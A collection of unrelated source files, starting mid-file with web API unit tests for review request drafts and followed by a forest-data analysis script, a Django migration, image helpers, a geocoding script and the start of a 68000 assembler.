update_fields=['last_updated']))
@webapi_test_template
def test_put_with_target_people_and_auth_backend_lookup_error(self):
"""Testing the PUT <URL> API with target_people and unknown user
lookup in auth backend errors
"""
def _get_or_create_user(*args, **kwargs):
raise Exception()
self.spy_on(StandardAuthBackend.get_or_create_user,
owner=StandardAuthBackend,
call_fake=_get_or_create_user)
review_request = self.create_review_request(submitter=self.user)
draft = ReviewRequestDraft.create(review_request)
rsp = self.api_put(
get_review_request_draft_url(review_request, None),
{
'target_people': 'unknown',
},
expected_status=INVALID_FORM_DATA.http_status)
self.assertEqual(rsp['stat'], 'fail')
self.assertEqual(rsp['err']['code'], INVALID_FORM_DATA.code)
self.assertEqual(rsp['fields'], {
'target_people': ['unknown'],
})
self.assertEqual(rsp['draft']['target_people'], [])
self.assertTrue(StandardAuthBackend.get_or_create_user.called_with(
username='unknown'))
draft = ReviewRequestDraft.objects.get(pk=draft.pk)
self.assertFalse(draft.target_people.exists())
def test_put_with_permission_denied_error(self):
"""Testing the PUT review-requests/<id>/draft/ API
with Permission Denied error
"""
bugs_closed = '123,456'
review_request = self.create_review_request()
self.assertNotEqual(review_request.submitter, self.user)
rsp = self.api_put(
get_review_request_draft_url(review_request),
{'bugs_closed': bugs_closed},
expected_status=403)
self.assertEqual(rsp['stat'], 'fail')
self.assertEqual(rsp['err']['code'], PERMISSION_DENIED.code)
def test_put_publish(self):
"""Testing the PUT review-requests/<id>/draft/?public=1 API"""
# We need to send e-mail out for both the initial review request
# publish and the draft publish in order for the latter to have a
# "Re:" in the subject.
with self.siteconfig_settings({'mail_send_review_mail': True},
reload_settings=False):
review_request = self.create_review_request(submitter=self.user,
publish=True)
draft = ReviewRequestDraft.create(review_request)
draft.summary = 'My Summary'
draft.description = 'My Description'
draft.testing_done = 'My Testing Done'
draft.branch = 'My Branch'
draft.target_people.add(User.objects.get(username='doc'))
draft.save()
# Since we're only testing for the draft's publish e-mail,
# clear the outbox.
mail.outbox = []
rsp = self.api_put(
get_review_request_draft_url(review_request),
{'public': True},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
review_request = ReviewRequest.objects.get(pk=review_request.id)
self.assertEqual(review_request.summary, "My Summary")
self.assertEqual(review_request.description, "My Description")
self.assertEqual(review_request.testing_done, "My Testing Done")
self.assertEqual(review_request.branch, "My Branch")
self.assertTrue(review_request.public)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(
mail.outbox[0].subject,
"Re: Review Request %s: My Summary" % review_request.pk)
self.assertValidRecipients(["doc", "grumpy"])
def test_put_publish_with_new_submitter(self):
"""Testing the PUT review-requests/<id>/draft/?public=1 API
with new submitter
"""
review_request = self.create_review_request(submitter=self.user,
publish=True)
draft = ReviewRequestDraft.create(review_request)
draft.owner = User.objects.get(username='doc')
draft.target_people = [draft.owner]
draft.save()
rsp = self.api_put(
get_review_request_draft_url(review_request),
{'public': True},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
review_request = ReviewRequest.objects.get(pk=review_request.id)
self.assertEqual(review_request.submitter.username, "doc")
self.assertTrue(review_request.public)
def test_put_publish_with_new_review_request(self):
"""Testing the PUT review-requests/<id>/draft/?public=1 API
with a new review request
"""
# Set some data first.
review_request = self.create_review_request(submitter=self.user)
review_request.target_people = [
User.objects.get(username='doc')
]
review_request.save()
self._create_update_review_request(self.api_put, 200,
review_request)
with self.siteconfig_settings({'mail_send_review_mail': True},
reload_settings=False):
rsp = self.api_put(
get_review_request_draft_url(review_request),
{'public': True},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
review_request = ReviewRequest.objects.get(pk=review_request.id)
self.assertEqual(review_request.summary, "My Summary")
self.assertEqual(review_request.description, "My Description")
self.assertEqual(review_request.testing_done, "My Testing Done")
self.assertEqual(review_request.branch, "My Branch")
self.assertTrue(review_request.public)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].subject,
"Review Request %s: My Summary" % review_request.pk)
self.assertValidRecipients(["doc", "grumpy"], [])
def test_put_as_other_user_with_permission(self):
"""Testing the PUT review-requests/<id>/draft/ API
as another user with permission
"""
self.user.user_permissions.add(
Permission.objects.get(codename='can_edit_reviewrequest'))
self._test_put_as_other_user()
def test_put_as_other_user_with_admin(self):
"""Testing the PUT review-requests/<id>/draft/ API
as another user with admin
"""
self._login_user(admin=True)
self._test_put_as_other_user()
@add_fixtures(['test_site'])
def test_put_as_other_user_with_site_and_permission(self):
"""Testing the PUT review-requests/<id>/draft/ API
as another user with local site and permission
"""
self.user = self._login_user(local_site=True)
local_site = self.get_local_site(name=self.local_site_name)
site_profile = self.user.get_site_profile(local_site)
site_profile.permissions['reviews.can_edit_reviewrequest'] = True
site_profile.save(update_fields=('permissions',))
self._test_put_as_other_user(local_site)
@add_fixtures(['test_site'])
def test_put_as_other_user_with_site_and_admin(self):
"""Testing the PUT review-requests/<id>/draft/ API
as another user with local site and admin
"""
self.user = self._login_user(local_site=True, admin=True)
self._test_put_as_other_user(
self.get_local_site(name=self.local_site_name))
def test_put_with_invalid_submitter(self):
"""Testing the PUT review-requests/<id>/draft/ API with an invalid
submitter
"""
review_request = self.create_review_request(submitter=self.user,
publish=True)
rsp = self.api_put(
get_review_request_draft_url(review_request),
{
'submitter': 'invalid',
},
expected_status=INVALID_FORM_DATA.http_status)
self.assertEqual(rsp['stat'], 'fail')
self.assertEqual(rsp['err']['code'], INVALID_FORM_DATA.code)
self.assertTrue('submitter' in rsp['fields'])
def test_put_with_publish_and_trivial(self):
"""Testing the PUT review-requests/<id>/draft/ API with trivial
changes
"""
review_request = self.create_review_request(submitter=self.user,
publish=True)
draft = ReviewRequestDraft.create(review_request)
draft.summary = 'My Summary'
draft.description = 'My Description'
draft.testing_done = 'My Testing Done'
draft.branch = 'My Branch'
draft.target_people.add(User.objects.get(username='doc'))
draft.save()
with self.siteconfig_settings({'mail_send_review_mail': True},
reload_settings=False):
rsp = self.api_put(
get_review_request_draft_url(review_request),
{
'public': True,
'trivial': True,
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
review_request = ReviewRequest.objects.get(pk=review_request.id)
self.assertEqual(review_request.summary, "My Summary")
self.assertEqual(review_request.description, "My Description")
self.assertEqual(review_request.testing_done, "My Testing Done")
self.assertEqual(review_request.branch, "My Branch")
self.assertTrue(review_request.public)
self.assertEqual(len(mail.outbox), 0)
@add_fixtures(['test_scmtools'])
def test_put_with_publish_and_signal_handler_with_queries(self):
"""Testing the PUT review-requests/<id>/draft/?public=1 API with
review_request_published signal handlers needing to fetch latest
changedescs/diffsets
"""
# We had a bug where diffset and changedesc information was cached
# prior to publishing through the API, and was then stale when handled
# by signal handlers. This change checks to ensure that state is
# always fresh.
def _on_published(review_request, *args, **kwargs):
# Note that we're explicitly checking all() and not count() here
# and below, because this is what was impacted by the bug before.
self.assertEqual(len(review_request.changedescs.all()),
expected_changedesc_count)
self.assertEqual(
len(review_request.diffset_history.diffsets.all()),
expected_diffset_count)
expected_changedesc_count = 0
expected_diffset_count = 0
review_request_published.connect(_on_published, weak=True)
try:
self.spy_on(_on_published)
review_request = self.create_review_request(submitter=self.user,
create_repository=True)
draft_url = get_review_request_draft_url(review_request)
# First, we're going to try publishing an initial draft. There
# should be 1 diffset upon publish, and 0 changedescs.
draft = ReviewRequestDraft.create(review_request)
draft.summary = 'My Summary'
draft.description = 'My Description'
draft.testing_done = 'My Testing Done'
draft.branch = 'My Branch'
draft.target_people.add(User.objects.get(username='doc'))
draft.save()
diffset = self.create_diffset(review_request, draft=True)
self.create_filediff(diffset)
self.assertEqual(len(review_request.changedescs.all()),
expected_changedesc_count)
self.assertEqual(
len(review_request.diffset_history.diffsets.all()),
expected_diffset_count)
expected_diffset_count += 1
rsp = self.api_put(
draft_url,
{'public': True},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertTrue(_on_published.spy.called)
_on_published.spy.reset_calls()
# Now try posting an update. There should be 1 changedesc, 2
# diffsets.
diffset = self.create_diffset(review_request, draft=True)
self.create_filediff(diffset)
expected_changedesc_count += 1
expected_diffset_count += 1
rsp = self.api_put(
draft_url,
{'public': True},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertTrue(_on_published.spy.called)
finally:
review_request_published.disconnect(_on_published)
def test_put_with_publish_with_first_draft_as_other_user(self):
"""Testing the PUT review-requests/<id>/draft/ API with first draft
as other user (with can_edit_reviewrequest after submit-as)
"""
user = User.objects.get(username='doc')
self.assertNotEqual(self.user, user)
self.user.user_permissions.add(
Permission.objects.get(codename='can_edit_reviewrequest'))
review_request = self.create_review_request(submitter=user,
target_people=[user])
ReviewRequestDraft.create(review_request)
self.spy_on(review_request_publishing.send)
self.spy_on(review_request_published.send)
rsp = self.api_put(
get_review_request_draft_url(review_request),
{
'public': True,
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
review_request = ReviewRequest.objects.get(pk=review_request.id)
self.assertTrue(review_request.public)
self.assertTrue(review_request_publishing.send.called_with(
sender=ReviewRequest,
user=user))
self.assertTrue(review_request_published.send.called_with(
sender=ReviewRequest,
user=user))
def test_put_with_publish_with_publish_as_owner(self):
"""Testing the PUT review-requests/<id>/draft/ API with
publish_as_owner=
"""
user = User.objects.get(username='doc')
self.assertNotEqual(self.user, user)
self.user.user_permissions.add(
Permission.objects.get(codename='can_edit_reviewrequest'))
review_request = self.create_review_request(submitter=user,
publish=True,
target_people=[user])
ReviewRequestDraft.create(review_request)
self.spy_on(review_request_publishing.send)
self.spy_on(review_request_published.send)
rsp = self.api_put(
get_review_request_draft_url(review_request),
{
'summary': 'New summary',
'public': True,
'publish_as_owner': True,
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
review_request = ReviewRequest.objects.get(pk=review_request.id)
self.assertEqual(review_request.summary, 'New summary')
self.assertTrue(review_request.public)
self.assertTrue(review_request_publishing.send.called_with(
sender=ReviewRequest,
user=user))
self.assertTrue(review_request_published.send.called_with(
sender=ReviewRequest,
user=user))
def test_put_with_numeric_extra_data(self):
"""Testing the PUT review-requests/<id>/draft/ API with numeric
extra_data values
"""
review_request = self.create_review_request(submitter=self.user,
publish=True)
rsp = self.api_put(
get_review_request_draft_url(review_request),
{
'extra_data.int_val': 42,
'extra_data.float_val': 3.14159,
'extra_data.scientific_val': 2.75e-15
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
draft_rsp = rsp['draft']
extra_data = draft_rsp['extra_data']
self.assertEqual(extra_data['int_val'], 42)
self.assertEqual(extra_data['float_val'], 3.14159)
self.assertEqual(extra_data['scientific_val'], 2.75e-15)
def test_get_or_create_user_auth_backend(self):
"""Testing the PUT review-requests/<id>/draft/ API
with AuthBackend.get_or_create_user failure
"""
class SandboxAuthBackend(AuthBackend):
backend_id = 'test-id'
name = 'test'
def get_or_create_user(self, username, request=None,
password=None):
raise Exception
backend = SandboxAuthBackend()
self.spy_on(auth.get_backends, call_fake=lambda: [backend])
        # The first spy messes with permissions; this lets the request through.
self.spy_on(ReviewRequest.is_mutable_by,
owner=ReviewRequest,
call_fake=lambda x, y: True)
self.spy_on(backend.get_or_create_user)
review_request = self.create_review_request(
submitter=self.user)
ReviewRequestDraft.create(review_request)
rsp = self.api_put(
get_review_request_draft_url(review_request, None),
{
'target_people': 'Target',
},
expected_status=400)
self.assertEqual(rsp['stat'], 'fail')
self.assertTrue(backend.get_or_create_user.called)
@add_fixtures(['test_scmtools'])
@webapi_test_template
def test_put_created_with_history_public_unfinalized_series(self):
"""Testing the PUT <URL> API with public=1 for a review request
created with commit history support that has an unfinalized diffset
"""
with override_feature_check(dvcs_feature.feature_id, enabled=True):
review_request = self.create_review_request(
create_with_history=True,
create_repository=True,
submitter=self.user)
diffset = self.create_diffset(review_request, draft=True)
draft = review_request.get_draft()
self.create_diffcommit(diffset=diffset)
draft.target_people = [review_request.submitter]
draft.save()
rsp = self.api_put(
get_review_request_draft_url(review_request),
{'public': True},
expected_status=500)
self.assertEqual(rsp, {
'stat': 'fail',
'err': {
'code': PUBLISH_ERROR.code,
'msg': 'Error publishing: This commit series is not '
'finalized.',
},
})
# If the draft still exists we indeed did not publish!
self.assertTrue(
ReviewRequestDraft.objects.filter(pk=draft.pk).exists())
@add_fixtures(['test_scmtools'])
@webapi_test_template
def test_put_created_with_history_public_finalized_series(self):
"""Testing the PUT <URL> API with public=1 for a review request
created with commit history support that has a finalized diffset
"""
with override_feature_check(dvcs_feature.feature_id, enabled=True):
review_request = self.create_review_request(
create_with_history=True,
create_repository=True,
submitter=self.user)
diffset = self.create_diffset(review_request, draft=True)
draft = review_request.get_draft()
self.create_diffcommit(diffset=diffset)
draft.target_people = [review_request.submitter]
draft.save()
diffset.finalize_commit_series(
cumulative_diff=self.DEFAULT_GIT_FILEDIFF_DATA_DIFF,
validation_info=None,
validate=False,
save=True)
rsp = self.api_put(
get_review_request_draft_url(review_request),
{'public': True},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertFalse(ReviewRequestDraft.objects.exists())
def _create_update_review_request(self, api_func, expected_status,
review_request=None,
local_site_name=None):
summary = "My Summary"
description = "My Description"
testing_done = "My Testing Done"
branch = "My Branch"
bugs = "#123,456"
if review_request is None:
review_request = self.create_review_request(submitter=self.user,
publish=True)
review_request.target_people.add(
User.objects.get(username='doc'))
func_kwargs = {
'summary': summary,
'description': description,
'testing_done': testing_done,
'branch': branch,
'bugs_closed': bugs,
}
if expected_status >= 400:
expected_mimetype = None
else:
expected_mimetype = review_request_draft_item_mimetype
rsp = api_func(
get_review_request_draft_url(review_request, local_site_name),
func_kwargs,
expected_status=expected_status,
expected_mimetype=expected_mimetype)
if expected_status >= 200 and expected_status < 300:
self.assertEqual(rsp['stat'], 'ok')
self.assertEqual(rsp['draft']['summary'], summary)
self.assertEqual(rsp['draft']['description'], description)
self.assertEqual(rsp['draft']['testing_done'], testing_done)
self.assertEqual(rsp['draft']['branch'], branch)
self.assertEqual(rsp['draft']['bugs_closed'], ['123', '456'])
draft = ReviewRequestDraft.objects.get(pk=rsp['draft']['id'])
self.assertEqual(draft.summary, summary)
self.assertEqual(draft.description, description)
self.assertEqual(draft.testing_done, testing_done)
self.assertEqual(draft.branch, branch)
self.assertEqual(draft.get_bug_list(), ['123', '456'])
return rsp
def _create_update_review_request_with_site(self, api_func,
expected_status,
relogin=True,
review_request=None):
if relogin:
self._login_user(local_site=True)
if review_request is None:
review_request = self.create_review_request(submitter='doc',
with_local_site=True)
return self._create_update_review_request(
api_func, expected_status, review_request, self.local_site_name)
def _test_get_with_force_text_type(self, text, rich_text,
force_text_type, expected_text):
url, mimetype, draft = \
self.setup_basic_get_test(self.user, False, None)
draft.description = text
draft.testing_done = text
draft.description_rich_text = rich_text
draft.testing_done_rich_text = rich_text
draft.save()
draft.changedesc.text = text
draft.changedesc.rich_text = rich_text
draft.changedesc.save()
rsp = self.api_get(url + '?force-text-type=%s' % force_text_type,
expected_mimetype=mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertIn(self.resource.item_result_key, rsp)
draft_rsp = rsp[self.resource.item_result_key]
self.assertEqual(draft_rsp['description_text_type'], force_text_type)
self.assertEqual(draft_rsp['testing_done_text_type'], force_text_type)
self.assertEqual(draft_rsp['changedescription'], expected_text)
self.assertEqual(draft_rsp['description'], expected_text)
self.assertEqual(draft_rsp['testing_done'], expected_text)
self.assertNotIn('raw_text_fields', draft_rsp)
rsp = self.api_get('%s?force-text-type=%s&include-text-types=raw'
% (url, force_text_type),
expected_mimetype=mimetype)
self.assertEqual(rsp['stat'], 'ok')
draft_rsp = rsp[self.resource.item_result_key]
self.assertIn('raw_text_fields', draft_rsp)
raw_text_fields = draft_rsp['raw_text_fields']
self.assertEqual(raw_text_fields['changedescription'], text)
self.assertEqual(raw_text_fields['description'], text)
self.assertEqual(raw_text_fields['testing_done'], text)
def _test_get_with_custom_and_force(self, source_text, rich_text,
force_text_type, expected_text,
custom_field_supports_markdown):
"""Helper function to test custom fields and ``?include-text-types=``.
This will test GET requests of custom text fields in two alternative
formats (one fixed as ``raw`` and the other controlled by
``force_text_type``) via the ``?include-text-types=`` query parameter.
Args:
source_text (unicode):
Text to use as source data for fields being tested.
rich_text (bool):
Whether ``source_text`` is rich text.
force_text_type (unicode):
Value for ``?force-text-type=`` query parameter. Should be one
of: ``plain``, ``markdown`` or ``html``.
expected_text (unicode):
Expected resultant text after forcing ``source_text`` to
requested format.
            custom_field_supports_markdown (bool):
                Whether the custom field being tested should enable markdown
                support.
"""
# Exercise custom fields that support markdown (BaseTextAreaField) and
# those that don't (BaseEditableField). Fields that don't support
# markdown do not get serialized into
# <text_type>_text_fields.extra_data.
if custom_field_supports_markdown:
base = BaseTextAreaField
else:
base = BaseEditableField
class CustomField(base):
# Utilize "text" as the field_id because it is a special case and
# results in a text type field named "text_type".
field_id = 'text'
fieldset = get_review_request_fieldset('main')
fieldset.add_field(CustomField)
try:
url, mimetype, draft = \
self.setup_basic_get_test(self.user, False, None)
source_text_type = "markdown" if rich_text else "plain"
draft.description = source_text
draft.description_rich_text = rich_text
draft.extra_data['text'] = source_text
if custom_field_supports_markdown:
draft.extra_data['text_type'] = source_text_type
draft.save()
rsp = self.api_get(url + '?force-text-type=%s' % force_text_type,
expected_mimetype=mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertIn(self.resource.item_result_key, rsp)
draft_rsp = rsp[self.resource.item_result_key]
self.assertIn('extra_data', draft_rsp)
extra_data = draft_rsp['extra_data']
self.assertEqual(draft_rsp['description_text_type'],
force_text_type)
self.assertEqual(draft_rsp['description'], expected_text)
self.assertNotIn('raw_text_fields', draft_rsp)
if custom_field_supports_markdown:
# Ensure the name of the text_type field has not been
# formulated incorrectly, since "text" is a special name, and
# thus we expect "text_type" not "text_text_type".
self.assertNotIn('text_text_type', extra_data)
self.assertEqual(extra_data['text'], expected_text)
self.assertEqual(extra_data['text_type'], force_text_type)
else:
self.assertEqual(extra_data['text'], source_text)
self.assertNotIn('text_type', extra_data)
# Exercise including multiple text types via a CSV list.
rsp = self.api_get(
'%s?force-text-type=%s&include-text-types=raw,%s'
% (url, force_text_type, force_text_type),
expected_mimetype=mimetype)
self.assertEqual(rsp['stat'], 'ok')
draft_rsp = rsp[self.resource.item_result_key]
self.assertIn('raw_text_fields', draft_rsp)
raw_text_fields = draft_rsp['raw_text_fields']
self.assertEqual(raw_text_fields['description'], source_text)
self.assertEqual(raw_text_fields['description_text_type'],
source_text_type)
other_field_name = '%s_text_fields' % force_text_type
self.assertIn(other_field_name, draft_rsp)
other_text_fields = draft_rsp[other_field_name]
self.assertEqual(other_text_fields['description'], expected_text)
self.assertEqual(other_text_fields['description_text_type'],
force_text_type)
if custom_field_supports_markdown:
self.assertIn('extra_data', raw_text_fields)
extra_data_raw = raw_text_fields['extra_data']
self.assertEqual(extra_data_raw['text'], source_text)
self.assertEqual(extra_data_raw['text_type'], source_text_type)
self.assertIn('extra_data', other_text_fields)
extra_data_other = other_text_fields['extra_data']
self.assertEqual(extra_data_other['text'], expected_text)
self.assertEqual(extra_data_other['text_type'],
force_text_type)
else:
self.assertNotIn('extra_data', raw_text_fields)
self.assertNotIn('extra_data', other_text_fields)
finally:
fieldset.remove_field(CustomField)
def _test_put_with_text_types(self, text_type_field, text_type_value,
expected_change_text_type,
expected_description_text_type,
expected_testing_done_text_type,
expected_custom_field_text_type,
expected_changedesc_update_fields=[],
expected_draft_update_fields=[]):
text = '`This` is a **test**'
class CustomField(BaseTextAreaField):
field_id = 'mytext'
fieldset = get_review_request_fieldset('main')
fieldset.add_field(CustomField)
try:
review_request = self.create_review_request(submitter=self.user,
publish=True)
ReviewRequestDraft.create(review_request)
self.spy_on(ChangeDescription.save, owner=ChangeDescription)
self.spy_on(ReviewRequestDraft.save, owner=ReviewRequestDraft)
rsp = self.api_put(
get_review_request_draft_url(review_request),
{
'changedescription': text,
'description': text,
'testing_done': text,
'extra_data.mytext': text,
text_type_field: text_type_value,
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
draft_rsp = rsp['draft']
extra_data = draft_rsp['extra_data']
self.assertEqual(draft_rsp['changedescription'], text)
self.assertEqual(draft_rsp['description'], text)
self.assertEqual(draft_rsp['testing_done'], text)
self.assertEqual(extra_data['mytext'], text)
self.assertEqual(draft_rsp['changedescription_text_type'],
expected_change_text_type)
self.assertEqual(draft_rsp['description_text_type'],
expected_description_text_type)
self.assertEqual(draft_rsp['testing_done_text_type'],
expected_testing_done_text_type)
self.assertEqual(extra_data['mytext_text_type'],
expected_custom_field_text_type)
draft = ReviewRequestDraft.objects.get(pk=rsp['draft']['id'])
self.compare_item(draft_rsp, draft)
self.assertTrue(ChangeDescription.save.last_called_with(
update_fields=sorted(['text'] +
expected_changedesc_update_fields)))
self.assertTrue(ReviewRequestDraft.save.last_called_with(
update_fields=sorted(['description', 'extra_data',
'last_updated', 'testing_done'] +
expected_draft_update_fields)))
finally:
fieldset.remove_field(CustomField)
def _test_put_as_other_user(self, local_site=None):
review_request = self.create_review_request(
with_local_site=(local_site is not None),
submitter='dopey',
publish=True)
self.assertNotEqual(review_request.submitter, self.user)
ReviewRequestDraft.create(review_request)
if local_site:
local_site_name = local_site.name
else:
local_site_name = None
rsp = self.api_put(
get_review_request_draft_url(review_request, local_site_name),
{
'description': 'New description',
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertTrue(rsp['draft']['description'], 'New description')
|
StarcoderdataPython
|
3381534
|
<reponame>OneStone2/mcmc_growth<filename>run.py
import argparse
import os.path
import read
import analyze
import numpy as np
import sys
if __name__ == '__main__':
argparser = argparse.ArgumentParser()
argparser.add_argument("state", help="2-letter code for the US state")
argparser.add_argument("--online", dest='online', const=True, default=False, action='store_const', help="Use FIA website")
args = argparser.parse_args()
args.state = [args.state]
if args.state == ['US']:
args.state = ['AL', 'AZ', 'AR', 'CA', 'CO', 'CT', 'DE', 'FL', 'GA', 'ID', 'IL', 'IN', 'IA', 'KS', 'KY', 'LA', 'ME', 'MD', 'MA', 'MI', 'MN', 'MS', 'MO', 'MT', 'NE', 'NV', 'NH', 'NJ', 'NY', 'NC', 'ND', 'OH', 'OK', 'OR', 'PA', 'RI', 'SC', 'SD', 'TN', 'TX', 'UT', 'VT', 'VA', 'WV', 'WI']
for state in args.state:
if not (
os.path.isfile('data/'+state+'_2a.csv')
or os.path.isfile('data/'+state+'_2a.csv')
):
if not os.path.isfile('data/'+state+'_1.csv'):
if args.online:
plots = read.parse(state, online=True)
else:
plots = read.parse(state, online=False)
read.cluster_prep_file(plots, state)
read.clean(args.state, b=True)
print 'Analyzing', state
print analyze.analyze_r01(state, human=True, time=True)
print analyze.analyze_r02(state, human=True, time=True)
print analyze.analyze_r03(state, human=True, time=True)
print analyze.analyze_r04(state, human=True, time=True)
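# Example invocations (a usage sketch based on the argument parser above; the
# state codes and data/ CSV layout are assumptions about the local setup):
#   python run.py ME            # analyze a single state from local CSV files
#   python run.py US --online   # fetch and analyze every listed state via the FIA website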
|
StarcoderdataPython
|
3479889
|
<gh_stars>0
# Generated by Django 2.0 on 2018-08-30 16:15
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('directoryentries', '0021_auto_20180822_1037'),
]
operations = [
migrations.AlterField(
model_name='boardmember',
name='city',
field=models.ForeignKey(blank=True, limit_choices_to={'deleted': False}, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='directoryenties_boardmember_city', to='taxonomy.City'),
),
migrations.AlterField(
model_name='boardmember',
name='state',
field=models.ForeignKey(blank=True, limit_choices_to={'deleted': False}, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='directoryenties_boardmember_state', to='taxonomy.State'),
),
migrations.AlterField(
model_name='boardmember',
name='zipcode',
field=models.ForeignKey(blank=True, limit_choices_to={'deleted': False}, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='directoryenties_boardmember_zipcode', to='taxonomy.Zipcode'),
),
migrations.AlterField(
model_name='studentboardmember',
name='building_location',
field=models.ForeignKey(blank=True, limit_choices_to={'deleted': False}, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='directoryentries_studentboardmember_building_location', to='taxonomy.Location'),
),
]
|
StarcoderdataPython
|
9643991
|
import sys
from os import path
sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))
from PIL import Image
from pathlib import Path
import numpy as np
import pandas as pd
from fastai.data.all import get_image_files
from data.load_image import load_image_for_feature_extraction
image_file_extensions = ('.png', '.jpg', '.jpeg', '.tiff', '.bmp', '.gif')
def is_image_path_valid(path: Path):
return path.is_file() and path.suffix in image_file_extensions
def load_image_file(path):
return Image.open(path)
def load_image_paths(path: Path):
fns = get_image_files(path)
return fns
def get_contingency_table(df: pd.DataFrame = None, pred_results=None, before_colname="", after_colname="", categories=None, category_names=None):
    if df is None:
df = pd.DataFrame(index=category_names)
for cat in category_names:
pred_slice = pred_results[categories == cat]
total = len(pred_slice)
blal = len(pred_slice[(pred_slice[before_colname] == 0) & (
pred_slice[after_colname] == 0)])
blac = len(pred_slice[(pred_slice[before_colname] == 0) & (
pred_slice[after_colname] == 1)])
bcac = len(pred_slice[(pred_slice[before_colname] == 1) & (
pred_slice[after_colname] == 1)])
bcal = len(pred_slice[(pred_slice[before_colname] == 1) & (
pred_slice[after_colname] == 0)])
df.loc[[cat], ['total']] = total
df.loc[[cat], ['blal']] = blal
df.loc[[cat], ['blac']] = blac
df.loc[[cat], ['bcac']] = bcac
df.loc[[cat], ['bcal']] = bcal
total = df.sum()
total.name = 'total'
df = df.append(total.transpose())
return df
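# Minimal usage sketch for get_contingency_table (hypothetical column names and
# toy data; real predictions come from the surrounding pipeline). The 'before'
# and 'after' columns hold 0/1 predictions and `categories` aligns row-for-row
# with the DataFrame:
#
#   example_preds = pd.DataFrame({'before': [0, 1, 1, 0], 'after': [0, 1, 0, 1]})
#   example_cats = np.array(['makeup', 'makeup', 'haircut', 'haircut'])
#   table = get_contingency_table(pred_results=example_preds,
#                                 before_colname='before',
#                                 after_colname='after',
#                                 categories=example_cats,
#                                 category_names=['makeup', 'haircut'])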
def preprocess(path):
return np.expand_dims(load_image_for_feature_extraction(path)[0], 0)
def get_cat(stem):
cat_dict = {
'makeupe': 'makeup',
'hiardoo': 'hairdoo',
'hairdoocut': 'haircut'
}
first_word = stem.split()[0]
    if first_word in cat_dict:
        return cat_dict[first_word]
else:
return first_word
|
StarcoderdataPython
|
6694621
|
#!/usr/bin/env python
# Example Google Maps URL: https://www.google.co.uk/maps/place/41+Rue+de+Villiers,+92200+Neuilly-sur-Seine,+France
# Corresponding Geocoding API request: http://maps.googleapis.com/maps/api/geocode/json?address=41 rue de villiers neuilly sur seine
import requests
addr= raw_input("which address: ")
url='http://maps.googleapis.com/maps/api/geocode/json?address=' + addr
r = requests.get(url)
# r.status_code
# r.json()
print "latitude is " + str(r.json()['results'][0]['geometry']['location']['lat'])
print "longitude is " + str(r.json()['results'][0]['geometry']['location']['lng'])
|
StarcoderdataPython
|
1862901
|
<reponame>rdeioris/necroassembler
from necroassembler import Assembler, opcode
from necroassembler.utils import pack_bits_be16u, pack_be16u, pack_be32u
from necroassembler.exceptions import AssemblerException
class InvalidMode(AssemblerException):
message = 'invalid 68000 mode'
D_REGS = ('d0', 'd1', 'd2', 'd3', 'd4', 'd5', 'd6', 'd7')
A_REGS = ('a0', 'a1', 'a2', 'a3', 'a4', 'a5', 'a6', 'a7')
CONDITIONS = ('T', 'F', 'HI', 'LS', 'CC', 'CS', 'NE', 'EQ',
'VC', 'VS', 'PL', 'MI', 'GE', 'LT', 'GT', 'LE')
def _is_immediate(token):
return len(token) > 1 and token.startswith('#')
def _is_displacement(token):
return token.lower() not in D_REGS + A_REGS + ('(', ')') and not token.startswith('#')
def _is_absolute_with_w(token):
return _is_displacement(token) and token.lower().endswith('.w')
def _is_absolute_with_l(token):
return _is_displacement(token) and token.lower().endswith('.l')
def _is_indexed_reg(token):
if token.lower().endswith('.w'):
return token.lower()[0:-2] in D_REGS+A_REGS
if token.lower().endswith('.l'):
return token.lower()[0:-2] in D_REGS+A_REGS
return token in D_REGS+A_REGS
IMMEDIATE = _is_immediate
DISPLACEMENT = _is_displacement
INDEXED_REG = _is_indexed_reg
ABSOLUTE = _is_displacement
ABSOLUTE_W = _is_absolute_with_w
ABSOLUTE_L = _is_absolute_with_l
MODES = ('Dn', 'An', '(An)', '(An)+', '-(An)', '(d16,An)', '(d8,An,Xn)',
'(xxx).W', '(xxx).L', '#<data>', '(d16,PC)', '(d8,PC,Xn)')
def _reg(token):
return int(token[1:])
def _cond(token):
if token[0:2].upper() == 'RA':
return 1
return CONDITIONS.index(token[0:2].upper())
def _indexed_reg(token):
d_or_a = 0 if token.lower().startswith('d') else 1
if token.lower().endswith('.w'):
return d_or_a, _reg(token[0:-2]), 0
if token.lower().endswith('.l'):
return d_or_a, _reg(token[0:-2]), 1
return d_or_a, _reg(token), 0
def _s_light(token):
token = token.lower()
if token.endswith('.b'):
return 1, 0
if token.endswith('.l'):
return 4, 2
if token.endswith('.w'):
return 2, 1
return 2, 1
def _s_dark(token):
token = token.lower()
if token.endswith('.b'):
return 1, 1
if token.endswith('.l'):
return 4, 2
if token.endswith('.w'):
return 2, 3
return 2, 3
def _s_middle(token):
token = token.lower()
if token.endswith('.l'):
return 4, 1
if token.endswith('.w'):
return 2, 0
return 2, 0
